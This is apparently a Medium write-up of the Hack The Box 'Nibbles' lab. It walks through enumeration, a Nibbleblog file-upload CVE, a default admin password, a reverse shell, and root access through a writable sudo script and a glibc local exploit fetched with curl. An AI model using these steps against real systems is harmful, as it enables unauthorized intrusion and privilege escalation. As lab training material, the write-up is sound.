Nibbles (Linux) Write-up — LinEnum & How to call a bash shell with sudo priv

I’ve done this box a long time ago while following a TCM’s video, but I decided to give it a go again with fresh perspective and with the help of Ippsec’s walkthrough https://www.youtube.com/watch?v=s_0GcRGv6Ds

Nmap Scan Result:

Nmap scan report for 10.129.168.232
Host is up (0.11s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn’t have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
58848/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s do web enumeration first.

Visiting the IP, I found the nibbleblog directory which took me to a blog site.

Started the gobuster from the directory:

gobuster dir -u http://10.129.168.232/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Version was found in:http://10.129.168.232/nibbleblog/README

Version: v4.0.3

Codename: Coffee Release date: 2014–04–01

Site: http://www.nibbleblog.com Blog: http://blog.nibbleblog.com Help & Support: http://forum.nibbleblog.com Documentation: http://docs.nibbleblog.com

Found the CVE for that version.

Vuln:CVE-2015–6967

“Unrestricted file upload vulnerability in the My Image plugin in Nibbleblog before 4.0.5 allows remote administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in content/private/plugins/my_image/image.php.”

Found admin.php page and attempted login with Username:admin password: nibbles — -> successful

Found a directory where I can upload a reverse shell script.

Uploaded a reverse shell and got the shell back.

can’t access tty though.

“bash -i” to make it interactive.

or python3 pty option

By typing sudo -l reveals that /home/nibbler/personal/stuff/monitor.sh can be ran as root without password

so I have unzipped the file (unzip personal.zip) and removed the current shell file.

Created a new file with vim:

#!/bin/bash
bash -i

Had some trouble typing this in vim as it tried to add space.

We utilized the Sudo functionality to run a script to call the bash with root privilege.

Running Linux Exploit Suggester

GitHub — mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool

host it on python simplehttp server and download it from the nibble server with

curl -o enum.sh IP/enum.sh

We’ll try the RationalLove

glibc < 2.26 — ‘getcwd()’ Local Privilege Escalation — Linux local Exploit (exploit-db.com)

Get the exploit and upload it again.

We need to compile the c file with gcc -o FILE_NAME Rationallove.c per the instruction.

For some reason, I had to execute it twice to get it work, but it worked.

Hacked!!! 捕獲完了!

--

--

--

HTTPS://www.Gorigorisensei.com

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why MEAN Stack is going to top charts in 2021?

Create another ansible role myloadbalancer to configure HAProxy LB.

Mastering Data Scraping using Python and NodeJS — Step 1 of 5

How to Restart Kubernetes Pod

Add an SSL Certificate to any VPS.

Saleor in Action: An Interview with Pfeffer & Frost

The European OSS Startup Ecosystem [2021]

Python HOW: Farewell Anaconda! Take Full Control of Your Development Environment

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Gorigorisensei

Gorigorisensei

HTTPS://www.Gorigorisensei.com

More from Medium

HTB Write-up Sunday Port 79 (finger) Enum, SSH pass cracking with panator

My First CTF (PicoCTF) — Obedient Cat!

Hack The Box — Bastion

Hacking? Hacker? What?